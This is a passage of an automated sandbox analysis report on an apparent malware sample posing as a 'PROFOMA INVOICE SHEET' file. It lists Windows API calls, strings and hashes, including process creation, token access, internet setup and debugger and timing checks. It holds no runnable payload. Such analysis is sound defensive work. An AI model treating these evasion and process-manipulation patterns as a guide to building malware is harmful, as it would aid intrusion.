                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B0C4
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B0E9
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B0F3
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0036ACD3,?,00008000), ref: 0036B126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: 4d2edb5ffeb0041bac02a231169afb708cab716caff2e9d0257419720b5e8650
                                    • Instruction ID: 098c9e1220791d3a45f0402581f1daab4bf1de5a2cf51d30e153a2cb0e3c7cff
                                    • Opcode Fuzzy Hash: 4d2edb5ffeb0041bac02a231169afb708cab716caff2e9d0257419720b5e8650
                                    • Instruction Fuzzy Hash: BD115E31C1151DE7CF029FE4D9596EEFF78FF0A711F118086D981B2149CB3196908B59
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00362DC5
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00362DD6
                                    • GetCurrentThreadId.KERNEL32 ref: 00362DDD
                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00362DE4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    APIs
                                      • Part of subcall function 00319639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00319693
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196A2
                                      • Part of subcall function 00319639: BeginPath.GDI32(?), ref: 003196B9
                                      • Part of subcall function 00319639: SelectObject.GDI32(?,00000000), ref: 003196E2
                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00398887
                                    • LineTo.GDI32(?,?,?), ref: 00398894
                                    • EndPath.GDI32(?), ref: 003988A4
                                    • StrokePath.GDI32(?), ref: 003988B2
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 003198CC
                                    • SetTextColor.GDI32(?,?), ref: 003198D6
                                    • SetBkMode.GDI32(?,00000001), ref: 003198E9
                                    • GetStockObject.GDI32(00000005), ref: 003198F1
                                    Similarity
                                    • API ID: Color$ModeObjectStockText
                                    • String ID:
                                    • API String ID: 4037423528-0
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 00361634
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,003611D9), ref: 0036163B
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003611D9), ref: 00361648
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,003611D9), ref: 0036164F
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 0035D858
                                    • GetDC.USER32(00000000), ref: 0035D862
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0035D882
                                    • ReleaseDC.USER32(?), ref: 0035D8A3
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 0035D86C
                                    • GetDC.USER32(00000000), ref: 0035D876
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0035D882
                                    • ReleaseDC.USER32(?), ref: 0035D8A3
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    APIs
                                      • Part of subcall function 00307620: _wcslen.LIBCMT ref: 00307625
                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00374ED4
                                    Strings
                                    Similarity
                                    • API ID: Connection_wcslen
                                    • String ID: *$LPT
                                    • API String ID: 1725874428-3443410124
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 0032E30D
                                    Strings
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    APIs
                                    • CharUpperBuffW.USER32(0035569E,00000000,?,0039CC08,?,00000000,00000000), ref: 003878DD
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • CharUpperBuffW.USER32(0035569E,00000000,?,0039CC08,00000000,?,00000000,00000000), ref: 0038783B
                                    Strings
                                    Similarity
                                    • API ID: BuffCharUpper$_wcslen
                                    • String ID: <s<
                                    • API String ID: 3544283678-4182610772
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: #
                                    • API String ID: 0-1885708031
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 0031F2A2
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0031F2BB
                                    Strings
                                    Similarity
                                    • API ID: GlobalMemorySleepStatus
                                    • String ID: @
                                    • API String ID: 2783356886-2766056989
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 003857E0
                                    • _wcslen.LIBCMT ref: 003857EC
                                    Strings
                                    Similarity
                                    • API ID: BuffCharUpper_wcslen
                                    • String ID: CALLARGARRAY
                                    • API String ID: 157775604-1150593374
                                    APIs
                                    • _wcslen.LIBCMT ref: 0037D130
                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0037D13A
                                    Strings
                                    Similarity
                                    • API ID: CrackInternet_wcslen
                                    • String ID: |
                                    • API String ID: 596671847-2343686810
                                    APIs
                                    • DestroyWindow.USER32(?,?,?,?), ref: 00393621
                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0039365C
                                    Strings
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0039461F
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00394634
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: '
                                    • API String ID: 3850602802-1997036262
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0039327C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00393287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 0bb09582eb573d103a8f7994054025e83033fe8445dcdab5f8ab6dc850d81754
                                    • Instruction ID: df63ddbd6e9d6e711c90fc8f2e8bd57fc8059c77eb67ececb57d5955f5a98a90
                                    • Opcode Fuzzy Hash: 0bb09582eb573d103a8f7994054025e83033fe8445dcdab5f8ab6dc850d81754
                                    • Instruction Fuzzy Hash: 7A11E2B13002087FFF229F94DC80EBB376EEB94364F110929F9589B290D6319D518760
                                    APIs
                                      • Part of subcall function 0030600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0030604C
                                      • Part of subcall function 0030600E: GetStockObject.GDI32(00000011), ref: 00306060
                                      • Part of subcall function 0030600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0030606A
                                    • GetWindowRect.USER32(00000000,?), ref: 0039377A
                                    • GetSysColor.USER32(00000012), ref: 00393794
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 1a6cd46651c306ea818ce5233d8f7b84bb810558eb891328dd937345d9eeff72
                                    • Instruction ID: c595abc35959064f6ad4a4206296a616cbc8b6d0c420bccf771b21ba2e0ae302
                                    • Opcode Fuzzy Hash: 1a6cd46651c306ea818ce5233d8f7b84bb810558eb891328dd937345d9eeff72
                                    • Instruction Fuzzy Hash: 491137B261020AAFDF02DFA8CC46EEA7BB8FB09314F015915F955E2250E735E8619B60
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0037CD7D
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0037CDA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: b3950b43cd133cc5cfbdfc6766f1eb84db40e4499eea0c3d30d7a10b617687df
                                    • Instruction ID: 3fc6c50f0525d2c8e2a1bbaf2165ef29ffa11cebe0c94ff418acd6759eccdc25
                                    • Opcode Fuzzy Hash: b3950b43cd133cc5cfbdfc6766f1eb84db40e4499eea0c3d30d7a10b617687df
                                    • Instruction Fuzzy Hash: E711C671225631BAD7364B668C85FE7BEACEF167A4F00922EB10D83180D7789C40D6F0
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 003934AB
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003934BA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: 8a3d4e2251dc06da7a7e11fa0631f3df6943674ad7ac644b8133ef7d92250c21
                                    • Instruction ID: d179d6adb5383e8b5d6046a10acffa60a95f4c4b061097657a3467ef57c56f76
                                    • Opcode Fuzzy Hash: 8a3d4e2251dc06da7a7e11fa0631f3df6943674ad7ac644b8133ef7d92250c21
                                    • Instruction Fuzzy Hash: C2116AB2100208ABEF139F65DC44ABB37AEEB05378F524724F965971E0C772EC519B60
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • CharUpperBuffW.USER32(?,?,?), ref: 00366CB6
                                    • _wcslen.LIBCMT ref: 00366CC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$BuffCharUpper
                                    • String ID: STOP
                                    • API String ID: 1256254125-2411985666
                                    • Opcode ID: 27d08076f0c12afbe942142320af4dd95da2c0fa1056a030b5b6a3918e54455d
                                    • Instruction ID: aede6be8f3d7ed1fb3456282fdc9e14aacaad2f6a015820685bd1288c0a55b63
                                    • Opcode Fuzzy Hash: 27d08076f0c12afbe942142320af4dd95da2c0fa1056a030b5b6a3918e54455d
                                    • Instruction Fuzzy Hash: CE012B326009268BCB139FBDDC529BF77B8FF607907014539E452971D9EB31D840C650
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 00363CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00363CCA
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00361D4C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: ef3d4de2f5a7364b9da96ea11b0b7ab6d4231aeb7f931e4c6a57b6c2b66cec0c
                                    • Instruction ID: 52905401c98192216e673e095f08acebcb63cd6585406af6f0b2c5fae80a523e
                                    • Opcode Fuzzy Hash: ef3d4de2f5a7364b9da96ea11b0b7ab6d4231aeb7f931e4c6a57b6c2b66cec0c
                                    • Instruction Fuzzy Hash: 5301D871651214ABCB06FBA4CC51DFE7768EB56350F08451AF8229B3C6EA315D1897A0
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 00363CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00363CCA
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00361C46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 00ed6825f661f4da2c8dd80f23101f72976a00ebc9133bcf977c96023fb3c684
                                    • Instruction ID: ced79dca776345b4e41ab830fe208f56f5111ce74ae730581aae397562491624
                                    • Opcode Fuzzy Hash: 00ed6825f661f4da2c8dd80f23101f72976a00ebc9133bcf977c96023fb3c684
                                    • Instruction Fuzzy Hash: CB01A775A8110467DB06EB90C962EFF77AC9B11340F18401AF5066B2CAEA60AE1897B1
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 00363CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00363CCA
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00361CC8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameSend_wcslen
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 624084870-1403004172
                                    • Opcode ID: 6b566c0729012a8454b1f06f70d012827c1493b0df61817bff3bc9737840ea0c
                                    • Instruction ID: 431d6993282d9c70cee932cf2a293b8f3afaa29da75b4123f72cffcbd2a530d4
                                    • Opcode Fuzzy Hash: 6b566c0729012a8454b1f06f70d012827c1493b0df61817bff3bc9737840ea0c
                                    • Instruction Fuzzy Hash: 370186B5A8115867DB17EBA4CA11FFF77AC9B11340F18401AB802B72C6EA619F08D771
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0031A529
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer_wcslen
                                    • String ID: ,%=$3y5
                                    • API String ID: 2551934079-982647064
                                    • Opcode ID: 1c333e8eeaa14ec8dca2d1a6c6d96069919f05b8e44ec90336a5bdabcbfe8f35
                                    • Instruction ID: a0354ac3ba438aa466ca5771eff197f6e5d205c5814452cf69662de1bb364348
                                    • Opcode Fuzzy Hash: 1c333e8eeaa14ec8dca2d1a6c6d96069919f05b8e44ec90336a5bdabcbfe8f35
                                    • Instruction Fuzzy Hash: 08014732702A1087C90BF368B81BFEE735A8B0A711F400016F5012F2C3DE206D858697
                                    APIs
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003D3018,003D305C), ref: 003981BF
                                    • CloseHandle.KERNEL32 ref: 003981D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseCreateHandleProcess
                                    • String ID: \0=
                                    • API String ID: 3712363035-499741732
                                    • Opcode ID: c3486b466185352dc44f53b2e6dfaf5b4579d63023002ac813ac4d0177f6b8b1
                                    • Instruction ID: 8db42152385f9e680f62eea7aae35cdb4548b40c8c376ce8ee8d09c950665cd8
                                    • Opcode Fuzzy Hash: c3486b466185352dc44f53b2e6dfaf5b4579d63023002ac813ac4d0177f6b8b1
                                    • Instruction Fuzzy Hash: 27F05EF6641310BBE3226761BC45FB73B5CDB05750F000422BB0AD91A2D67A8E0483BA
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: 3, 3, 16, 1
                                    • API String ID: 176396367-3042988571
                                    • Opcode ID: c874151520c392b93b004b1aacf909a406fd36d303bca9e49e486c6d4b895f80
                                    • Instruction ID: 5894a0a34a8150923a5d161a241ffbe31379ab1a5176976cbe9b7bb7c9938759
                                    • Opcode Fuzzy Hash: c874151520c392b93b004b1aacf909a406fd36d303bca9e49e486c6d4b895f80
                                    • Instruction Fuzzy Hash: 6FE02B16204330109233327BBCC5A7F568ACFC5750734186BF985C7266EBD4CDD193A0
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00360B23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Message
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 2030045667-4017498283
                                    • Opcode ID: 0ffa339e09931b0db58b246c2f88a889de218f09d75ff5bf4001cf34ae541325
                                    • Instruction ID: ee1cf59857063d0ff7eb51a1fc75cb3fd107497b22a01de708321d35c597fad4
                                    • Opcode Fuzzy Hash: 0ffa339e09931b0db58b246c2f88a889de218f09d75ff5bf4001cf34ae541325
                                    • Instruction Fuzzy Hash: 8CE048312553183AD61737947C43FD97A848F09F51F10446AF7589D5C38BE2649046B9
                                    APIs
                                      • Part of subcall function 0031F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00320D71,?,?,?,0030100A), ref: 0031F7CE
                                    • IsDebuggerPresent.KERNEL32(?,?,?,0030100A), ref: 00320D75
                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0030100A), ref: 00320D84
                                    Strings
                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00320D7F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                    • API String ID: 55579361-631824599
                                    • Opcode ID: 167a4e1581eb446e531eb934473bb59e28c347c8bb37304a5146cb504eff6d08
                                    • Instruction ID: 8358ef332470bd115926010a7aa974abca672c300f67da09bf9ec149a6dbbb25
                                    • Opcode Fuzzy Hash: 167a4e1581eb446e531eb934473bb59e28c347c8bb37304a5146cb504eff6d08
                                    • Instruction Fuzzy Hash: 96E092742013118FDB379FB8F4043927BE4AF04740F004D2EE4C2C6652DBB1E4488B91
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0031E3D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
